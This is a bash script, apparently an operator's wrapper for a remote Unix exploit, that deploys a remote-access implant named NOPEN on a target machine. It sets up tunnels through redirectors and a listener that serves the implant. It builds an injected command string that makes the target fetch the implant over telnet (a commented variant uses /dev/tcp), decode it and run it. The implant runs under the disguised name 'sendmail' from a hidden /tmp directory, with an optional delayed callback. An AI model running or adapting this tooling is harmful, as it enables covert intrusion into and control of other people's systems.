#!/bin/bash
PROG=`basename ${0}`
VER="1.4.3.3"
CALLBACKDELAY=3
AUTOMODE="$TARGETIP"
[ "$TUNNELPORT" ] || TUNNELPORT=`cat /current/bin/.tunnelport 2>/dev/null`
[ "$TUNNELPORT" ] || TUNNELPORT=18787
COLOR_SUCCESS="\\033[1;32m"
COLOR_FAILURE="\\033[1;31m"
COLOR_WARNING="\\033[1;33m"
COLOR_NORMAL="\\033[0;39m"
COLOR_NOTE="\\033[0;34m"
COLOR_WHITE="\\033[4;97m"
SETCOLOR_SUCCESS="echo -en $COLOR_SUCCESS"
SETCOLOR_FAILURE="echo -en $COLOR_FAILURE"
SETCOLOR_WARNING="echo -en $COLOR_WARNING"
SETCOLOR_NORMAL="echo -en $COLOR_NORMAL"
SETCOLOR_NOTE="echo -en $COLOR_NOTE"
SETCOLOR_WHITE="echo -en $COLOR_WHITE"
usagetext="
Usage: $PROG -i TARGETIP [options]

-i IP     IP of target machine (NO DEFAULT)
-R IP     Actual target IP when redirecting via 127.0.0.1 (in case IP
          the -scan reported is wrong in -sploit mode)
-l IP     IP of attack machine (Default: the first active IP found in
          this order: ppp0, ppp1, eth0 or eth1) 
-n #      rat upload port (Default: a random port)
-p #      Use port # for RAT listen/callback. (Default: random)
-s #      Change delay used for -c to # seconds (must appear before -c).
-c        Use NOPEN syntax to have RAT callback after a delay (Default
          delay: $CALLBACKDELAY seconds)
-z        Do NOT use uncomrpess at the either end
-e        Do NOT use \"2>&1\" on target. Fouls up in some shells.
-U        Do NOT pipe to uudecode, instead create a .uu file.
-r rat    name of rat on target (Default: sendmail)
-x #      port to start mini X server on (Default: random port)
-D dir    directory to work from/create on target (Default = /tmp/.scsi)
-P        Assume PATH=. will fail so use ./ratname
          target, and MUST NOT use uuencode on upload.
-a ARCH   String used to determine which architecture NOPEN server to
          upload from /current/up/morerats/ using this (note tail -1):
          \"ls -1 ./noserver* 2>/dev/null | grep -i \${ARCH} | tail -1\".
          If not provided or no match, /current/up/noserver is assumed.

NOTE: -n# and -p# can be the same, even in callback mode. $PROG provides
      a mechanism to allow netcat callback to finish, and its -tunnel to
      close (if redirecting) before the NOPEN server calls back on the
      same port.

examples: 
   $PROG -l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999 -D /tmp/.dir
   $PROG -i 10.0.3.1
   $PROG -i TARGET_IP -l REDIRECTOR_IP
"
usagetextshort=$usagetext

note() {
    if [ "$1" = "-n" ] ; then
      N=$1
      shift
    fi
    echo -e $N "$COLOR_NOTE${*}$COLOR_NORMAL"
}
notered() {
    if [ "$1" = "-n" ] ; then
      N=$1
      shift
    fi
    echo -e $N "$COLOR_FAILURE${*}$COLOR_NORMAL"
}
tunnelcmd() {
    echo "${*}"	| nc -w1 -u 127.0.0.1 $TUNNELPORT
}

usage ()
{
  [ "$1" = "exit" ] && EXIT=1 && shift
  if [ "$1" = "-h" ] ; then
    shift
    echo -e "$usagetext"
    notered NOTE: The only REQUIRED ARGUMENT is now -i
    echo "
The best way to back out of $PROG once done (whether or not you get on
target) is to kill off the packrat window first with ^C then ^D. Then
kill of the xc window the same way, finally kill the ys.auto.

$PROG Version $VER"
  fi
  if [ "$1" = "-v" ] ; then
    echo "$PROG version $VER"
    shift
  fi
  ERRSTR="${*}"
  if [ "$ERRSTR" ] ; then
    notered "\a${ERRSTR}"
  fi
  [ "$EXIT" ] && exit
} # usage

doit() {
    CMDLINE="\nCommandLine: ${0} ${*}"

    if [ $# -lt 1 ] ; then
	usage exit -h
    fi
    unset UUFILE ACTUALTARGET NEWACTUALTARGET
    ERRREDIR="2>&1"
    while getopts hl:n:r:D:x:zi:ucs:p:Pva:eUR: optvar ; do
	case "$optvar"   in
	    h|v) usage exit -$optvar ;;
	    i) REMOTE_IP=${OPTARG}  ;;
	    l) CALLBACKIP=${OPTARG}  ;;
	    c) CALLBACK=" callback";;
	    n) LOCAL_PORT=${OPTARG} ;;
	    r) RAT_NAME=${OPTARG}  ;;
	    x) XPORT=${OPTARG} ;;
	    D) DIR=${OPTARG} ;;
	    U) UUFILE=yes ;;
	    u) NOUU=yes ;;
	    p) NOPENPORT="$OPTARG";;
	    s) CALLBACKDELAY="$OPTARG";;
	    e) ERRREDIR="";;
	    z) NOZIP=yes
	       PACKARGS="$PACKARGS -z" ;;
	    P) DOTSLASH="./";;
	    k) USEKSH=yes
		# this is not working dammit 
		NOUU=yes;;
	    # In -a, ignore it if ARCH already defined by autoattack
	    a) [ "$ARCH" ] || ARCH="$OPTARG";;
	    R) NEWACTUALTARGET="$OPTARG";;
	    *) usage exit Invalid option $! ;;
	esac
    done
    unset NOSERVER TRICKYTIMING
    if [ "$ARCH" ] ; then
	NOSERVER=`ls -1 /current/up/morerats/noserver* 2>/dev/null | grep -i ${ARCH} | tail -1`
    fi
    [ "$NOSERVER" ] || NOSERVER=/current/up/noserver

    [ "${DIR}" ] || DIR="/tmp/.scsi"
    [ "${XPORT}" ] || XPORT=`mkrandom -n 10025 32222 2>/dev/null`
    [ "${XPORT}" ] || XPORT=12121
    
    if [ ! "$CALLBACKIP" ] ; then
	if [ ! "`which grepip 2>/dev/null`" ] ; then
	    notered "\aMust have \"grepip\" in path or provide -l IP on command line"
	    exit
	fi
	for INT in ppp0 ppp1 eth0 eth1 ; do 
	    ADDR=`ifconfig $INT 2>/dev/null | grepip | egrep -v "255|127\.0" | head -1`
	    [ "$ADDR" ] && CALLBACKIP=$ADDR
	    [ "$CALLBACKIP" ] && break
	done
	while [ ! "$CALLBACKIP" ] ; do
	    echo -en "What is your local/redirector IP address? "
	    [ "$CALLBACKIP" ] && echo -en "[$CALLBACKIP] "
	    read ans
	    [ "$ans" -a "${ans:0:1}" != "y" -a "${ans:0:1}" != "Y" ] && \
		CALLBACKIP=$ans
	    CALLBACKIP=`echo $CALLBACKIP | grepip`
	    [ "$ans" ] && echo -e "\n\n\a$ans is not a valid IP. Try again.\n\n"
	done
	INT=" ($INT)"
	note "Using $CALLBACKIP$INT for -l local IP argument"
    fi

    # Check to make sure tcp LISTEN is there
    PORTS=`netstat -an | grep tcp.*LIST | cut -f 2 -d ":" | sort -rn | awk '{print $1}' |egrep -v "6000"`
    
    note Local ports LISTENing: $PORTS
    echo
    which packrat >/dev/null 2>&1
    NOPACKRAT=$?
    [ "$NOPACKRAT" = "0" ] || usage exit "No packrat in your path"
    
    if [ "$LOCAL_PORT" ] ; then
	for i in $PORTS -1 ; do
	    [ "$i" = "$LOCAL_PORT" ] && break
	done
	if [  $i -lt 0 ] ; then
	    PACKRAT_SCRIPME=yes
	else
	    notered "\aLocalPort=$LOCAL_PORT provided on command line already LISTENing. Assuming that is the upload."
	    sleep 2
	fi
    else
	unset ans MAKENEWPORT
	if [ "$RANDOMLOCAL_PORT" ] ; then
	    $LOCAL_PORT=$RANDOMLOCAL_PORT
	else
	    MAKENEWPORT=1
	fi
	while [ "$MAKENEWPORT" ] ; do
	    LOCAL_PORT=`mkrandom -n 2>/dev/null`
	    RANDOMORNOT=" a random"
	    RANDOMLOCAL_PORT=$LOCAL_PORT
	    [ ! "$LOCAL_PORT" ] && usage exit "mkrandom not in path--needed to generate random rat upload port"
	    ALREADYTHERE=`netstat -an | grep tcp.*LIST | grep ":$LOCAL_PORT "`
	    [ "$ALREADYTHERE" ] || break
	done
	while [ ! -e $NOSERVER ] ; do
	    notered Put correct noserver into $NOSERVER and hit return or ^C to abort.
	    read ans
	    continue
	done
	if [ "$NOPACKRAT" = "0" ] ; then
	    PACKRAT_SCRIPME=yes
	else
	    usage exit "No packrat in your path$COLOR_NORMAL"
	fi
    fi

    if [ "`which grepip 2>/dev/null`" ] ; then
	# Check IP arguments if we can
	[ "$REMOTE_IP" ] && ORIGREMOTE_IP=" ($REMOTE_IP)"
	[ "$CALLBACKIP" ] && ORIGCALLBACKIP=" ($CALLBACKIP)"
	REMOTE_IP=`echo $REMOTE_IP | grepip`
	CALLBACKIP=`echo $CALLBACKIP | grepip`
    fi

    if [ "$CALLBACK" ] ; then
	if [ "$LOCAL_PORT" = "$NOPENPORT" ] ; then
	    notered "Forcing delay (-s #) of at least 10 seconds since NOPEN callback"
	    notered "and Rat upload ports are the same ($LOCAL_PORT). You must be sure to ^C the"
	    notered "netcat window within 10 seconds after the upload completes."
	    [ $CALLBACKDELAY -lt 10 ] && CALLBACKDELAY=10
	    TRICKYTIMING=yes
	fi
    fi
    if [ "$LOCAL_PORT" = "$XPORT" ] ; then
	usage exit "FATAL ERROR: -x port and -n port MUST NOT BE THE SAME.\n\nUNABLE TO CONTINUE."
    fi

    [ "$REMOTE_IP" ] || usage exit "-i argument$ORIGREMOTE_IP is missing or not an IP"
    [ "$CALLBACKIP" ] || usage exit "-l argument$ORIGCALLBACKIP is missing or not an IP"
    [ "$UUFILE" ] || UUFILE=no
    [ "$NOUU" ] && PACKARGS="$PACKARGS -u"
    [ "$RAT_NAME" ] || RAT_NAME=sendmail
    if [ ! "$NOPENPORT" ] ; then
	NOPENPORT=`mkrandom -n 2>/dev/null`
	if [ "$NOPENPORT" ] ; then
	    note "Using random NOPEN$CALLBACK port $NOPENPORT"
	fi
    fi
    [ ! "$NOPENPORT" ] && usage exit "mkrandom not in path--needed to generate random port"

    ifconfig -a | grep $CALLBACKIP > /dev/null && ITSLOCAL=yes
    if [ ! "$ITSLOCAL" ] ; then
	REDIRECTOR="/redirector"
	[ "$TARGETIP" ] && REDIRECTOR2=" $TARGETIP via $CALLBACKIP via "
    fi
    echo
    note "########################################"
    [ "$REDIRECTOR" ] || notered "Calling directly back to this box"
    note "Local$REDIRECTOR IP = ${CALLBACKIP}$INT"
    [ "$CALLBACK" ] && note "Using NOPEN Callback to $CALLBACKIP:$NOPENPORT"
    [ "$CALLBACK" ] && notered "     (after a DELAY of $CALLBACKDELAY seconds)"
    [ "$NOSERVER" ] && note Uploading rat: $NOSERVER
    [ "$CALLBACK" ] || note "Starting rat listener on port ${NOPENPORT}"
    note "Remote IP =$REDIRECTOR2 ${REMOTE_IP}"
    note "Rat uplaod port = ${LOCAL_PORT}"
    note "Name of Rat = ${RAT_NAME}"
    [ "$NOZIP" ] && note "Not using compress/uncompress"
    [ "$NOZIP" ] || note "Using compress/uncompress"
    note "Starting mini X server on port ${XPORT}"
    note "Directory to create/use = ${DIR}"
    #[ "$USEKSH" ] && note "Using ksh method to upload rat to Solaris target"
    #[ "$USEKSH" ] || note "Using telnet method to upload rat"
    note "########################################"
    echo

    # show what we were called with
    echo -e "$CMDLINE"

    note "Using$RANDOMORNOT port ($LOCAL_PORT) for local RAT upload listener (packrat)"
    unset RANDOMORNOT
    if [ "${REMOTE_IP:0:3}" = "127" ] ; then
	REDIRECT=yes
	ifconfig -a | grep $CALLBACKIP > /dev/null && NOTGOOD=yes
	if [ "$NOTGOOD" ] ; then
	   notered "ARE YOU SURE? It looks like you are redirecting (due to remote being $REMOTE_IP),
and yet you want the RAT callback to go to $CALLBACKIP, WHICH\a IS ONE OF YOUR LOCAL IPs???"
	    sleep 1
	    notered -n "\n<A>bort to <C>ontinue DESPITE THIS PROBLEM!! [C]\a"
	    read blah
	    if [ "${blah:0:1}" = 'a' -o "${blah:0:1}" = 'A' ] ; then
		notered "ABORTING!"
		exit
	    fi
	fi
	DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`
	if [ "$AUTOMODE" ] ; then
	    # Anything specific to automated usage here
	    note In AUTO/-sploit mode
	fi

	if [ "$AUTOMODE" ] ; then
	    if [ "$NEWACTUALTARGET" ] ; then
		TARGETIP="$NEWACTUALTARGET"
	    fi
	    ACTUALTARGET=$TARGETIP
	else
	    if [ "$NEWACTUALTARGET" ] ; then
		notered "-R not usable except via -sploit"
		exit 1
	    fi
	fi
	until [ `echo $ACTUALTARGET | grepip 2>/dev/null` ] ; do
	    [ "$ACTUALTARGET" ] && echo Bad IP $ACTUALTARGET
	    echo -en "\nEnter Target IP after redirecting through ${CALLBACKIP}: "
	    [ "$DEFTARGET" ] &&  echo -en "[$DEFTARGET] " 
	    read ACTUALTARGET
	    [ ! "$ACTUALTARGET" ] && [ "$DEFTARGET" ] && ACTUALTARGET=$DEFTARGET
	done
	note Redirecting via 127.0.0.1/$CALLBACKIP to $ACTUALTARGET
	TEST=`netstat -an | grep "udp.*:$TUNNELPORT "`
	while [ ! "$TEST" ] ; do
	    notered "No NOPEN -tunnel seen on udp/$TUNNELPORT\n\nSet one up on $CALLBACKIP with:\n\n"
	    note "\t-tunnel $TUNNELPORT udp\n\n${COLOR_FAILURE}and then hit return."
	    read ans
	    TEST=`netstat -an | grep "udp.*:$TUNNELPORT "`
	done
	note "Sending tunnel commands to 127.0.0.1:$TUNNELPORT"
	# This will create /current/bin/*tunnel
	[ -x "/current/etc/autosploit" ] && /current/etc/autosploit -T
	
	tunnelcmd u 177 $ACTUALTARGET
	tunnelcmd r $LOCAL_PORT
	tunnelcmd r $XPORT
	tunnelcmd s
	
    fi
    [ "$ACTUALTARGET" ] || ACTUALTARGET=$REMOTE_IP
    
    if [ "$PACKRAT_SCRIPME" ] ; then
# DISABLE this now...we want this to use new style netcat, where
# it breaks when local file is done.
#	if [ -x /current/bin/nc.YS -a ! "$TRICKYTIMING" ] ; then
#	    PACKARGS="$PACKARGS -n /current/bin/nc.YS"
#	fi
	EXPLOIT_SCRIPME="packrat$PACKARGS $RAT_NAME $NOSERVER $LOCAL_PORT"
	note "\nStarting local LISTENer to send noserver via port $LOCAL_PORT\n"
	export EXPLOIT_SCRIPME
	echo EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"  scripme -t PACKRAT -F -X \"-bg slategrey -fg white -geometry 131x55-0+0\"
	EXPLOIT_SCRIPME="$EXPLOIT_SCRIPME" scripme -t PACKRAT -F -X "-bg slategrey -fg white -geometry 131x55-0+0"
    fi
    if [ "$REDIRECT" ] ; then
	if [ "$CALLBACK" ] ; then
	    note "\n\nYou will need a NOPEN listener window on $CALLBACKIP:\n"
	fi
	PASTABLE=`grep -v "^#" /current/down/didthis 2>/dev/null | egrep "nstun|noclient"`
	PASTABLE="
cd /current/down
${PASTABLE}"

	note "${PASTABLE}"
	#  echo "FIRST/-tunnel nopen window on $CALLBACKIP:"
	#  SECOND="SECOND "
	#  note "\n-tunnel\n\nu 177 $ACTUALTARGET\nr $LOCAL_PORT\nr $XPORT\n\ns\n"
	if [ ! "$CALLBACK" ] ; then
	    notered -n "<A>bort <C>ontinue once NOPEN and packrat windows are ready [C] "
	    read blah
	    if [ "${blah:0:1}" = 'a' -o "${blah:0:1}" = 'A' ] ; then
		notered "ABORTING!"
		exit
	    fi
	fi
    fi

    if [ "$CALLBACK" ] ; then
	RAT_PREARGS=" S=$CALLBACKDELAY D=-uc${CALLBACKIP}:${NOPENPORT}"
	if [ "$REDIRECT" ] ; then
	    notered "\aYou must establish a NOPEN listener on $CALLBACKIP:$NOPENPORT\n\n"
	    if [ "$ITSLOCAL" ] ; then
		echo "${SECOND}remote nopen window on $CALLBACKIP:"
		note "${PASTABLE}\n/current/bin/noclient -l $NOPENPORT\n\n"
	    else
		MORE=""
		echo "${SECOND}remote nopen window on $CALLBACKIP:"
		if [ "$TRICKYTIMING" ] ; then
		    note "The -lsh while loop will wait until the netcat is gone,\nthen start the NOPEN callback listener."
		    MORE="-lsh while [ 1 ] ; do ps -efwww | egrep -v \"scripme|perl|uX_local|defunct|grep\" | grep nc.*$NOPENPORT.*${RAT_NAME} > /dev/null || break ; sleep 1 ; done ; sleep 1 ; dotunnel c 2\n\n"
		fi
		note "${PASTABLE}\n\n${MORE}-nrtun $NOPENPORT\n\n"
		if [ "$TRICKYTIMING" ] ; then
		    notered "BE SURE TO ^C THE NETCAT/PACKRAT BEFORE CALLBACK DELAY OF"
		    notered "10+ SECONDS IS UP (BUT AFTER UPLOAD COMPLETES).\n"
		fi
		unset MORE
	    fi
	    notered -n "<A>bort <C>ontinue once NOPEN windows are ready [C] "
	    read blah
	    if [ "${blah:0:1}" = 'a' -o "${blah:0:1}" = 'A' ] ; then
		notered "ABORTING!"
		exit
	    fi
	else
	    MORE=""
	    if [ "$TRICKYTIMING" ] ; then
		MORE="\n(but not until the netcat is done with that same port)"
	    fi
	    note "\n\a${PROG} will establish a NOPEN listener on $CALLBACKIP:$NOPENPORT$MORE\nby execing:\n"
	    note "\ncd /current/down/\n/current/bin/noclient -l $NOPENPORT\n\n"
#	    notered -n "<A>bort <C>ontinue once NOPEN windows are ready [C] "
#	    read blah
#	    if [ "${blah:0:1}" = 'a' -o "${blah:0:1}" = 'A' ] ; then
#		notered "ABORTING!"
#		exit
#	    fi
	fi
    else
	RAT_PREARGS=" D=-ul${NOPENPORT}"
	if [ "$REDIRECT" ] ; then
	    POSTRUN="${PASTABLE}

-nstun $ACTUALTARGET ${NOPENPORT}"
	else
	    POSTRUN="noclient ${ACTUALTARGET}:${NOPENPORT}"
	fi
    fi

    # Now check what we can before continuing
    echo ""
    while [ 1 ] ; do

	[ "$CALLBACK" ] || OKNRTUN=okeydokey
	[ "$REDIRECT" ] || OKUDP=okeydokey
	[ "$REDIRECT" ] && OKUDP=`netstat -an | egrep "^udp.*0 (0.0.0.0|127.0.0.1):177 "`
	[ "$CALLBACK" ] && OKNRTUN=`netstat -an | grep "^tcp.*:$NOPENPORT " | egrep "ESTAB|LISTEN"`
	OKPACKRAT=`netstat -an | egrep "^tcp.*(0.0.0.0|127.0.0.1):$LOCAL_PORT .*LISTEN"`
	    
	[ "$OKUDP" ] || notered "No udp/177 seen locally in netstat"
	if [ ! "$OKNRTUN" ] ; then
	    if [ "$REDIRECT" ] ; then
		notered "No -nrtun or noclient -l for callback seen locally on port $NOPENPORT in netstat"
	    else
		OKNRTUN=okeydokey
	    fi
	fi
	if [ ! "$OKPACKRAT" ] ; then
	    if [ "$OKUDP" -a "$OKNRTUN" ] ; then
		notered "waiting for packrat to start on port $LOCAL_PORT"
	    else
		notered "No packrat seen locally on port $LOCAL_PORT in netstat"
	    fi
	fi
	[ "$OKUDP" ] && [ "$OKNRTUN" ] && [ "$OKPACKRAT" ] && break

	[ "$OKUDP" ] && [ "$OKNRTUN" ] && sleep 2 && continue
	unset OKUDP OKNRTUN OKPACKRAT
	notered "\a\n\nCANNOT PROCEED"
	notered "\a\n\nFix this and either <A>bort or <R>etry. [R] "
	read blah
	if [ "${blah:0:1}" = 'a' -o "${blah:0:1}" = 'A' ] ; then
	    notered "ABORTING!"
	    exit
	fi
    done
    unset OKUDP OKNRTUN OKPACKRAT
    if [ "$CALLBACK" ] ; then
	NOCLIENTCALL="cd /current/down\n../bin/noclient ${ACTUALTARGET}:$NOPENPORT"
	[ "$REDIRECT" ] && NOCLIENTCALL="-nstun $ACTUALTARGET ${NOPENPORT}"
	TAKENOTE="$TAKENOTE
========================================================

You did a NOPEN callback. Be sure to test a call FORWARD if you get on.
Something like (${COLOR_FAILURE}each on the right box${COLOR_NORMAL}):

-listen $NOPENPORT

$NOCLIENTCALL
"
    fi
    if [ "$POSTRUN" ] ; then
	TAKENOTE="$TAKENOTE
========================================================

$POSTRUN
"
    fi
    
    if [ "$TAKENOTE" ] ; then
	TAKENOTE="
========================================================
========================================================
               NOTES/PASTABLES FOR LATER

$TAKENOTE
========================================================
========================================================
"
    fi
    [ "$AFTERNOTE" ] && [ -e $AFTERNOTE ] && rm -f $AFTERNOTE
    echo "$TAKENOTE" > /current/.afternote.$$
    export AFTERNOTE=/current/.afternote.$$

    #note "\nStarting local mini-X server via scripme"
    note "\nStarting exploit xc via scripme"
    EXPLOIT_SCRIPME="xc -x $CALLBACKIP -y $XPORT -s $CALLBACKIP $REMOTE_IP 2>&1"
    echo EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"  scripme -t YS-xc-window -F -X \"-fg white -bg black -geometry 131x55\"
    EXPLOIT_SCRIPME="$EXPLOIT_SCRIPME"  scripme -t YS-xc.$ACTUALTARGET -F -X "-bg white -fg black -geometry 78x51+654+0"

    unset UNCOMPRESS
    if [ ! "$NOZIP" ] ; then
	UNCOMPRESS=" && uncompress -f ${RAT_NAME}.Z ${ERRREDIR} "
	[ "$USEKSH" ] && UNCOMPRESS=".Z && uncompress -f ${RAT_NAME}.Z ${ERRREDIR} "
    fi

    #old way:
    #2>&1 </dev/console 2>&1 |uudecode 2>&1 > /dev/null 2>&1
    #</dev/console |uudecode > /dev/null 2>&1
if [ "$UUFILE" = "no" ] ; then
    VENDOR_STR="\`TERM=vt100;export TERM;cd /tmp;mkdir -p ${DIR} && cd ${DIR} ; telnet ${CALLBACKIP} ${LOCAL_PORT} </dev/console |uudecode > /dev/null ${ERRREDIR} $UNCOMPRESS && chmod 0700 ${RAT_NAME} && PATH=${DIR}:.${RAT_PREARGS} ${DOTSLASH}${RAT_NAME}\`"
else 
    VENDOR_STR="\`TERM=vt100;export TERM;cd /tmp;mkdir -p ${DIR} && cd ${DIR} ; telnet ${CALLBACKIP} ${LOCAL_PORT} </dev/console > ${RAT_NAME}.uu ; uudecode ${RAT_NAME}.uu > /dev/null ${ERRREDIR} $UNCOMPRESS && chmod 0700 ${RAT_NAME} && PATH=${DIR}:.${RAT_PREARGS} ${DOTSLASH}${RAT_NAME}\`"
fi
#20050708: Need TERM apparently?
#    VENDOR_STR="\`cd /tmp;mkdir -p ${DIR} && cd ${DIR} ; telnet ${CALLBACKIP} ${LOCAL_PORT} </dev/console |uudecode > /dev/null 2>&1 $UNCOMPRESS && chmod 0700 ${RAT_NAME} && PATH=${DIR}:.${RAT_PREARGS} ${DOTSLASH}${RAT_NAME}\`"
    #VENDOR_STR="\`mkdir ${DIR};cd ${DIR} && telnet ${CALLBACKIP} ${LOCAL_PORT} </dev/console |uudecode > /dev/null 2>&1 && uncompress -f ${RAT_NAME}.Z && chmod 0700 ${RAT_NAME} && PATH=${DIR} ${RAT_NAME}\`"
    #if [ "$USEKSH" ] ; then
    #    VENDOR_STR="\`cd /tmp;mkdir ${DIR} 2>&1 && cd ${DIR} 2>&1 ; /bin/ksh -c \"cat < /dev/tcp/${CALLBACKIP}/${LOCAL_PORT}> ${RAT_NAME}${UNCOMPRESS}\" ; chmod 0700 ${RAT_NAME} && PATH=${DIR}:.${RAT_PREARGS} ${DOTSLASH}${RAT_NAME}\`"
    #fi

    notered "\n\nNow running the following via:\n\n./uX_local -e '$VENDOR_STR' -v -p $XPORT -c xxx\n\n"
    note "VENDOR_STR=\"$VENDOR_STR\"\n\n"

    notered "RUNNING (yet another) SCRIPME window with the uX_local line shown above."
    EXPLOIT_SCRIPME="./uX_local -e '$VENDOR_STR' -v -p $XPORT -c xxx"  scripme -t YS-uXlocal.$ACTUALTARGET -F -X "-bg white -fg black -geometry 78x51+76+0"

} # end doit


[ "${*}" ] || usage exit -h
[ "${*}" = "-h" ] && usage exit -h
ATTEMPT=1
while [ 1 ] ; do
    if [ "$TARGETIP" -a "$ATTEMPT" = "1" ] ; then
	echo -e "$usagetextshort"
	# This is called by autoattack so allow changes
	notered "Automatic mode has pre-set these arguments:\n$COLOR_NORMAL\n${*}\n"
	notered "\n\nJust hit return to keep these arguments, or input a new and complete argument\nstring to use instead:\n"
	read ans
	if [ "$ans" ] ; then
	    ARGS="$ans"
	    note Changing arguments to: $ARGS
	else
	    note NOT changing arguments
	fi
    fi
    if [ "$ARGS" ] ; then
	OPTIND=1
        doit $ARGS
    else
	OPTIND=1
	ARGS="${*}"
	doit ${*} 
    fi

#    note "\n\n$PROG attempt number $ATTEMPT is complete."
    DATE=`date -u`
    [ "$EXPLOIT_SCRIPME" ] && VIA=" via scripme popups"
    note "\n\n$PROG attempt$VIA is complete at $DATE.\n\n"
#    if [ "$CALLBACK" ] ; then
    if [ "" ] ; then
	notered "\nNOTE: Callback will not happen until $CALLBACKDELAY seconds or more have passed.\n"
	while [ $CALLBACKDELAY -ge 0 ] ; do
	    notered -n "\rCounting down: $CALLBACKDELAY  "
	    CALLBACKDELAY=`expr $CALLBACKDELAY - 1`
	    sleep 1
	done
    fi
#    note "\nIf it worked, hit return to exit.\n"
#    notered -n "Do you want to try again? [N] "
#    read ans
#    [ ! "$ans" -o "${ans:0:1}" = "n" -o "${ans:0:1}" = "N" ] && break

    # No retries anymore - too messy
    break
    # echo -e "$usagetext" 
    LASTARGS=$ARGS
    note "\n\nYour last attempt tried the following arguments:\n\n"
    note "$LASTARGS\n\n"
    notered "\n\nJust hit return to try the same arguments again, or input a new and complete argument\nstring to use. Enter \"DONE\" or ^C to quit."
    read ans
    [ "$ans" = "DONE" ] && break
    if [ "$ans" ] ; then
	ARGS="${ans}"
    fi
    ATTEMPT=`expr $ATTEMPT + 1`

done

if [ ! -z "$AUTOMODE" ] ; then
  notered "\n\nYou MUST ${COLOR_NOTE}FIRST$COLOR_FAILURE ^C and then ^D in each of the netcat,
uX_local and xc scripme windows started earlier to be able to exit this window.\n\n"
else
    note "`cat $AFTERNOTE`"
    if [ ! "$CALLBACK" ] ; then
	if [ ! "$REDIRECT" ] ; then
	    if [ "$ITSLOCAL" ] ; then
		note "\n\nPastable to connect once it is running:\n\n  noclient $REMOTE_IP:$NOPENPORT\n\n"
		notered -n "<E>xit, or <C>ontinue with noclient connection? [C] "
		read blah
		if [ "${blah:0:1}" = 'e' -o "${blah:0:1}" = 'E' ] ; then
		    notered "Done"
		    exit
		fi
		exec noclient $REMOTE_IP:$NOPENPORT
	    fi
	else
	    note "\n\nPastable to connect from $CALLBACKIP once it is running:\n\n  -nstun $ACTUALTARGET:$NOPENPORT\n\n"
	    note "\n\nTo close tunnels in -tunnel $TUNNELPORT udp window:\n\n  closetunnel\n"
	fi
    else
	if [ ! "$REDIRECT" ] ; then
	    if [ "$TRICKYTIMING" ] ; then
		note "\n$PROG will start the noclient listener once the netcat is done with that same port\n\n"
		while [ 1 ] ; do
		    ps -efwww | egrep -v "scripme|perl|uX_local|defunct|grep" | grep -q nc.*$NOPENPORT.*${RAT_NAME} > /dev/null || break
		    sleep 1
		done
		sleep 1
	    else
		note "\n$PROG will start the noclient listener now...^C to abort\n\n"
	    fi
	    cd /current/down
	    exec noclient -l $NOPENPORT
	fi
    fi
fi 
